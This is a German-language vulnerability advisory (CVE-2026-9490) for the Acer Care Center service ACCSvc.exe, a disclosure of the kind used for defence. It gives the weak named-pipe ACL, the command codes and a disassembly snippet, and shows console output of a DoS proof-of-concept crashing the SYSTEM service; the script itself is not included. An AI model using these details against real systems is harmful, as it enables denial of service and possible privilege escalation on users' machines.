CVE-Kennung: CVE-2026-9490
Forscher: Vo Duc Thang (ugvxb)
Danksagung: https://community.acer.com/en/kb/articles/19668
1. Zusammenfassung
Eine kritische Sicherheitslücke wurde im Dienst Acer Care Center (ACCSvc.exe) identifiziert. Die Schwachstelle erlaubt jedem authentifizierten lokalen Benutzer, den Systemdienst zum Absturz zu bringen (Denial of Service) und möglicherweise Privilegien über eine schwach gesicherte Named-Pipe-Schnittstelle zu erhöhen.
Der Dienst, der mit SYSTEM-Berechtigungen (LocalSystem) läuft, stellt eine Named Pipe mit übermäßig freizügigen Zugriffskontrollen bereit, die Lese-, Schreib- und Ausführungsberechtigungen für alle authentifizierten Benutzer gewährt.
2. Schwachstellendetails
2.1 Betroffene Komponente
| Attribut | Wert |
|---|
| Produkt | Acer Care Center |
| Komponente | ACCSvc.exe (ACC Service) |
| Dienstname | ACCSvc |
| Installationspfad | C:\Program Files (x86)\Acer\Care Center\ |
| Dienstkonto | LocalSystem (NT AUTHORITY\SYSTEM) |
| Starttyp | AUTO_START |
| Named Pipe | \.\pipe\treadstone_service_LightMode |
2.2 Schwachstelle #1: Denial of Service
Beschreibung
Der ACCSvc-Dienst erstellt eine Named Pipe mit einem schwachen Sicherheitsdeskriptor, der es jedem authentifizierten Benutzer erlaubt, eine Verbindung herzustellen und Nachrichten zu senden. Wenn eine speziell präparierte Nachricht (Nachrichtentyp 0x03) an die Pipe gesendet wird, stürzt der Dienst mit dem Exit-Code 1067 (ERROR_PROCESS_ABORTED) ab.
Sicherheitsdeskriptor (SDDL)
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)
SDDL-Analyse
Auswirkungen
Ein Standardbenutzer ohne besondere Berechtigungen kann den Systemdienst ACCSvc beenden, wodurch die Funktionalität von Acer Care Center nicht mehr verfügbar ist.
2.3 Schwachstelle #2: Potenzielle lokale Privilegienausweitung
Beschreibung
Dieselbe schwache Named-Pipe-ACL erlaubt authentifizierten Benutzern das Senden von Befehlsnachrichten, die den Dienst veranlassen, Launcher-Anwendungen über CreateProcessAsUserW auszuführen.
Befehlscodes
| Befehl | Hex-Wert | Ziel-Ausführbare Datei |
|---|
| 0x19065 | 102501 | ACCAPPLauncher.exe |
| 0x19066 | 102502 | ACCSWALauncher.exe |
| 0x19067 | 102503 | ACCFixpackFolderCleaner.exe |
3. Technische Analyse
3.1 Binäranalyse
| Attribut | Wert |
|---|
| Datei | ACCSvc.exe |
| Typ | PE32+ executable (console) x86-64 |
| Analysetool | Radare2 |
|
3.2 Identifizierte Schlüsselfunktionen
3.3 Parameter zur Erstellung der Named Pipe
Pipe Name: \\.\pipe\treadstone_service_LightMode
dwOpenMode: 0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode: 0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances: 255
nOutBufferSize: 512
nInBufferSize: 512
nDefaultTimeOut: 1000ms
3.4 Befehlsverteilungslogik
0x140008b1a mov ebx, dword [rdx + rcx] ; Read command
0x140008b1d lea eax, [rbx - 0x19065] ; Subtract base
0x140008b23 cmp eax, 2 ; Check range
0x140008b26 ja 0x140008bde ; Jump if invalid
4. Exploitationsergebnisse
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\Authenticated Users
FILE_ADD_FILE
FILE_CREATE_PIPE_INSTANCE
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
SYNCHRONIZE
READ_CONTROL
RW BUILTIN\Administrators
FILE_ALL_ACCESS
C:\Users\thang\Downloads\Acer>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ACC Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1067 (0x42b)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
Ergebnis: Standardbenutzer hat erfolgreich den SYSTEM-Dienst zum Absturz gebracht!
5. Risikobewertung
5.1 CVSS v4.0-Score
| Metrik | Wert |
|---|
| CVSS 4.0-Vektor | AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M |
| CVSS-Basiswert | 6.8 (Mittel) |
5.2 CWE-Klassifikationen
| CWE-ID | Name |
|---|
| CWE-269 | Unsachgemäßes Privilegienmanagement |
6. Haftungsausschluss
Dieser PoC dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch. Die Ausnutzung ohne Autorisierung ist illegal.